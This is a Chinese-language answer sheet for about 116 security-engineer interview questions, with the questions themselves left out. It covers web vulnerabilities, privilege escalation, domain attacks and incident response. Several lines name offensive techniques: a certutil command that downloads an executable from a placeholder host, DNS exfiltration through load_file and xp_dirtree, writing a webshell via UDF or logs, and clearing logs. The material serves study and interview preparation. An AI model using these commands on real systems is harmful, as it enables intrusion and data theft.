本文整理了 116 道网络安全工程师面试真题,涵盖基础工具、Web 漏洞、系统安全、内网渗透及应急响应等领域。内容包括 BurpSuite 功能、SQL 注入类型、XSS 与 CSRF 区别、提权方法、DDoS 防御等核心考点,并附带详细参考答案。文章经过清理,去除无关推广信息,专注于技术知识点的梳理与解答,适合安全从业人员备考参考。
Burp Suite 是 Web 应用安全测试的集成平台,常用功能包括:Proxy(抓包代理)、Repeater(重放请求)、Intruder(暴力破解/模糊测试)、Scanner(自动化漏洞扫描)、Decoder(编解码)、Comparer(比较响应)等。
reverse_tcp 是攻击者监听端口,目标机器主动连接攻击者;bind_tcp 是目标机器开启端口并监听,攻击者连接目标。在防火墙环境下,reverse_tcp 更容易穿透出站规则。
首先进行信息收集,包括域名解析、子域名枚举、端口扫描、CMS 识别、技术栈分析等,确定攻击面后再制定渗透计划。
通过搜索引擎语法(如 site:、filetype:)、Whois 查询、DNS 记录分析、GitHub/GitLab 代码泄露搜索、历史备份文件查找等方式收集。
学习平台包括 FreeBuf、先知社区、看雪论坛等;漏洞提交平台包括补天、CNVD、CNNVD 及各厂商 SRC。
不同 CMS 有特定的已知漏洞和默认路径,识别 CMS 可快速定位常见漏洞点(如 WordPress 插件漏洞、DedeCMS 后台路径)。
即使 CMS 安全,可能存在未授权访问的目录、备份文件、配置文件或上传目录,扫描可发现这些隐藏入口。
Apache, Nginx, IIS, Tomcat, JBoss, WebLogic, Resin 等。
观察错误页面特征、尝试访问特定系统文件(如 /etc/passwd vs C:\Windows\system32)、通过 HTTP 头中的 Server 字段判断。
检查编辑器是否存在文件上传漏洞,检查 admin 目录是否为弱口令后台,结合两者可能实现 RCE 或权限提升。
直接访问 .svn/.git 目录获取源码,分析后端逻辑、硬编码密码、API 密钥等敏感信息。
可用于社工攻击、钓鱼邮件发送、重置密码攻击或关联其他账号信息。
优点:效率高、覆盖广;缺点:误报率高、难以发现业务逻辑漏洞、易被 WAF 拦截。
规则库的更新频率、绕过 WAF 的能力、对复杂逻辑的识别能力、误报率控制。
避免在生产高峰期扫描,防止影响业务;注意扫描策略配置,避免触发安全设备封禁 IP;遵守授权范围。
功能:主机发现、端口扫描、服务版本探测、操作系统识别、脚本扫描。绕过 Ping 使用 -Pn,漏洞检测使用 --script=vuln。
21(FTP), 22(SSH), 23(Telnet), 25(SMTP), 53(DNS), 80(HTTP), 135/139/445(SMB), 3306(MySQL), 3389(RDP) 等。
需要数据库用户有 FILE 权限,且 secure_file_priv 配置允许写路径,通常需 root 权限。
出于安全考虑,数据库端口不应对外暴露,仅通过 Web 应用层访问,减少攻击面。
利用双写绕过、宽字节注入、注释符替换、大小写混合、编码转换等方式。
布尔盲注、时间盲注、报错注入、联合查询注入、堆叠注入、二次注入等。
MySQL: extractvalue, updatexml; MSSQL: error() 等。
通过 sleep() 或 waitfor delay 语句,观察响应时间是否显著增加。
均无直接回显,依赖布尔逻辑或时间差来推断数据内容。
可以,order by 常用于探测列数,无需逻辑运算符。
尝试 PUT/DELETE 方法、HTTP 头注入、JSON 参数注入、XML 注入、URL 编码绕过。
否,可查询数据库名、表名、字段名、任意表数据、甚至执行系统命令(若权限允许)。
寻找其他入口如文件上传、反序列化、命令执行漏洞,或利用注入点配合数据库写文件功能。
思路:联合查询写文件、存储过程写文件、第三方工具。优选:联合查询写文件(若权限允许)。
sqlmap -u "url" --dbs 或 --tables --columns --dump,配合--tamper 绕过 WAF。
分析 URL 结构,尝试闭合括号、注释符,或使用字符串拼接技巧绕过过滤。
INTO OUTFILE, INTO DUMPFILE, LOAD_FILE, UDF 提权等。
使用预编译语句(Prepared Statements)、输入验证、最小权限原则、WAF 防护。
使用 case when、ifnull、substr、ascii 组合逻辑,或利用数据库特性替代。
使用 union select 代替 union all,或用 limit offset 代替 comma,或用括号分组。
INTO OUTFILE(需 file 权限)、UDF 提权后执行、phpmyadmin 后门。条件:数据库权限、路径可写。
MySQL: load_file(CONCAT('http://', @@hostname)) 或 dnslog 模块;MSSQL: xp_dirtree 或 openrowset 指向 DNS 域名。
利用 phpMyAdmin 导入 SQL 文件功能,或在 config.inc.php 中配置后门。
不能,若动态表名或排序字段拼接仍可能注入。例如:ORDER BY ${sort}。
使用十六进制编码、ASCII 码、注释符(/**/)、空格替换(%09/%0a)。
IIS 6.0 (解析 .asa/.cer), IIS 7.0+ (解析 .php/.txt), Apache (.htaccess), Nginx (fastcgi 配置错误)。
修改.htaccess 重写规则,将 .jpg 文件解析为 PHP,实现伪静态绕过。
检查编辑器是否支持 HTML 标签注入,尝试 XSS 或文件上传漏洞。
下载数据库文件,使用 Access 查看器或专用工具(如 Access Viewer)打开提取数据。
修改文件名后缀、使用 Base64 编码、调整编码格式、使用在线解码工具。
分析前端校验逻辑,判断是否可绕过,查看接口地址以便后续 Fuzz。
服务器配置限制了脚本执行权限,或 WAF 拦截了脚本扩展名。
可能是黑客留下的后门目录,用于存放恶意文件或作为跳板。
寻找包含文件名的参数,尝试遍历常见路径(/etc/passwd, config.php),或修改参数值。
Tomcat (server.xml), MySQL (my.cnf), Windows (boot.ini/system.ini), Linux (/etc/passwd)。
限制文件扩展名、白名单机制、统一存储路径、不直接暴露文件路径。
利用 JS 注入、XSS 存储型漏洞,或通过 CSS 加载远程资源获取路径。
CSRF(跨站请求伪造):利用用户身份;XSS(跨站脚本):注入脚本;XXE(实体注入):读取本地文件。修复:Token 验证、输出编码、禁用外部实体。
CSRF 伪造请求;SSRF 服务端请求内网;重放攻击 复制有效数据包重复发送。
通过 XSS 窃取 Cookie 或 Token,维持会话;或植入持久化脚本。
(回答经验)常用 Xray、XSStrike 等工具辅助。
CORS 由服务端设置 Access-Control-Allow-Origin。利用:配置不当允许任意源。绕过:JSONP 回调劫持、CORS 预检绕过。
alert(), document.cookie。绕过:标签过滤、事件过滤、编码混淆。
添加随机 Token、验证 Referer、SameSite Cookie 属性。
SSRF 访问 Redis 服务,写入 SSH Key 或 WebShell 到指定目录(需 Redis 可写且配置正确)。
PHP: system(), exec(), eval(), include(); Java: Runtime.exec(); Python: os.system()。
OGNL 表达式注入,导致远程代码执行。
对象序列化为字节流,反序列化时调用 readObject 执行危险方法,常涉及 CommonsCollections 等库。
共用同一数据库或 Session/Cookie 作用域配置不当。
用户名枚举漏洞,确认合法用户列表,进而进行撞库或社工。
越权访问(IDOR)、支付篡改、验证码爆破。修复:权限校验、金额校验、验证码强度。
同上,用于用户枚举。
角度:是否可复用、是否可爆破、是否可绕过。问题:固定验证码、简单数学题、无刷新限制。
Ping 域名解析、历史 DNS 记录、SSL 证书信息、非标准端口扫描、TTL 分析。
通过公开信息(社交媒体、简历)构建画像,发送钓鱼邮件或电话诱导提供凭证。
了解 Cobalt Strike, Metasploit, Empire 等工具的原理和使用场景。
静态分析(SAST)、动态分析(DAST)、交互式分析(IAST)、人工审计。
阅读源码、关注输入输出点、追踪数据流、检查安全函数使用。
误报率高、无法理解业务逻辑、难以发现深层逻辑漏洞。
为了在开发早期发现并修复漏洞,降低后期维护成本和安全风险。
OWASP SAMM, Microsoft SDL, BSIMM, NIST SSDF。
包含培训、设计、开发、验证、发布、响应六个阶段的安全活动。
注释符、编码、双写、大小写、空字节、特殊字符替换。
防火墙拦截、服务未启动、IP 被封禁、端口映射错误。
某些命令解析空格会导致参数截断,影响提权脚本执行。
利用服务漏洞、内核漏洞、弱口令、计划任务、注册表项等。
SUID 二进制、内核漏洞、 cron 任务、sudo 配置错误、内核模块。
UDF 提权、慢查询日志写 Shell、General Log 写 Shell。
需要 MySQL 运行在 Windows 环境,且拥有 SYSTEM 权限,lib_mysqludf_sys.dll 可上传。
利用软件本身的配置错误或已知漏洞,如 Jenkins、GitLab 等。
信息收集、横向移动(Pass-the-Hash)、域控攻击、权限维持。
利用其他存储过程、CLR 程序集、或者通过 OLE 对象执行命令。
黄金票据(Golden Ticket):伪造 TGT,权限最高;白银票据(Silver Ticket):伪造 ST,针对特定服务。利用:Kerberos 协议漏洞。
加载自定义 DLL 到 MySQL 进程空间,执行系统命令。
见 81、82。
certutil -urlcache -split -f http://ip/file.exe
清除 Event Logs、修改文件时间戳、使用 Rootkit、加密流量。
内存抓取、键盘记录、哈希破解、利用系统漏洞读取明文。
通过 HTTP 响应头(Server, X-Powered-By)、Cookie、JS 文件指纹识别。
下载备份文件,恢复数据库,利用数据库写文件功能。
利用 INTO OUTFILE 写 PHP 文件,或 UDF 提权。
文件上传、代码注入、漏洞利用、弱口令登录后台。
伪造 ARP 响应包,将网关 MAC 地址指向攻击机,实现中间人攻击。
ARP 欺骗、ARP 泛洪、ARP 毒化。
静态绑定 ARP、DAI(动态 ARP 检测)、监控异常流量。
DOS(拒绝服务):单点攻击;DDoS(分布式拒绝服务):多点协同攻击,旨在耗尽目标资源。
方式:SYN Flood, UDP Flood, HTTP Flood。目标:带宽、CPU、连接数。后果:服务不可用。
流量型、协议型、应用层。
发送大量 SYN 包但不完成三次握手,占用服务器半连接队列。
半连接队列满,新连接无法建立,服务器 CPU 升高。
流量分析、日志分析、特征匹配、溯源分析。
高防 IP、CDN 清洗、限流、黑名单、WAF。
Top 10 包括注入、失效认证、敏感数据泄露、XXE、Broken Access Control、安全配置错误、XSS、反序列化、组件漏洞、日志不足。
Apache, Nginx, IIS, Tomcat。
Java JSON 解析库。漏洞:反序列化 RCE(如 AutoType 绕过)。修复:升级版本,关闭 AutoType。
未授权访问 Docker API,可执行容器逃逸、宿主机命令执行。
Log4j2, Spring Cloud, Fastjson 等。
(根据公开资料回答)如各类框架漏洞、中间件漏洞。
断网、查杀病毒、修补漏洞、修改密码、恢复备份。
排查进程、网络连接、定时任务、日志分析、隔离主机。
(示例)通过分析攻击 IP 的 ASN 信息和流量特征,定位到攻击者位于某地区,并协助警方取证。
本文档整理自网络安全行业高频面试题,旨在帮助求职者系统复习核心知识点。
微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML转Markdown 互为补充。 在线工具,Markdown转HTML在线工具,online
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML转Markdown在线工具,online
通过删除不必要的空白来缩小和压缩JSON。 在线工具,JSON 压缩在线工具,online
将JSON字符串修饰为友好的可读格式。 在线工具,JSON美化和格式化在线工具,online
